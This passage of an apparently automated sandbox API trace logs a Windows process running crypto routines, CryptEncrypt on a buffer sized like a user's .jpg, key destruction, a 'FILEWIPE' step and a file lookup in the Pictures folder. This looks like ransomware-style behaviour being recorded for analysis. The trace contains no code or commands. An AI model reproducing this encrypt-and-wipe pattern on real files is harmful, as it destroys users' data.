out: lpMsg=0x6ae324) returned 0 [0041.121] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.121] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.121] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0041.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.122] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.122] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0041.122] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.122] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.122] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.122] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.122] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.122] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.122] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.122] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.122] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.122] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.122] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.122] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0041.122] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.123] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x3a26, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x3a30) returned 1 [0041.123] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.123] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.123] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.123] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.123] CharLowerBuffW (in: lpsz="byte[14897]", cchLength=0xb | out: lpsz="byte[14897]") returned 0xb [0041.123] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.123] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.123] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0041.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.123] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xaccea8*, pdwDataLen=0x6ae220*=0x3a26, dwBufLen=0x3a30 | out: pbData=0xaccea8*, pdwDataLen=0x6ae220*=0x3a30) returned 1 [0041.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0041.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.124] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.124] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.124] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.124] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.124] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.124] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0041.125] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.125] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.125] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0041.125] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.125] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.125] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.125] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.126] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.127] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.127] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.127] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0041.127] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.127] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.127] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.127] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.127] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.127] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.127] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0041.127] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.127] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.128] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.128] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.128] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.128] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.128] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.128] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.128] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.128] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.128] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0041.128] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.128] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.128] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.129] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.129] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.129] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.129] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.129] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.129] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0041.129] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.129] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0041.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0041.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.129] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.130] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.130] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.131] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.131] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0041.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.131] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.131] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\jn9U.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb975d470, ftCreationTime.dwHighDateTime=0x1d5b5db, ftLastAccessTime.dwLowDateTime=0x5d448bc0, ftLastAccessTime.dwHighDateTime=0x1d5c2ff, ftLastWriteTime.dwLowDateTime=0x5d448bc0, ftLastWriteTime.dwHighDateTime=0x1d5c2ff, nFileSizeHigh=0x0, nFileSizeLow=0x3a26, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jn9U.jpg", cAlternateFileName="")) returned 0x7c2240 [0041.131] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0041.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.131] PeekMessageW (in: 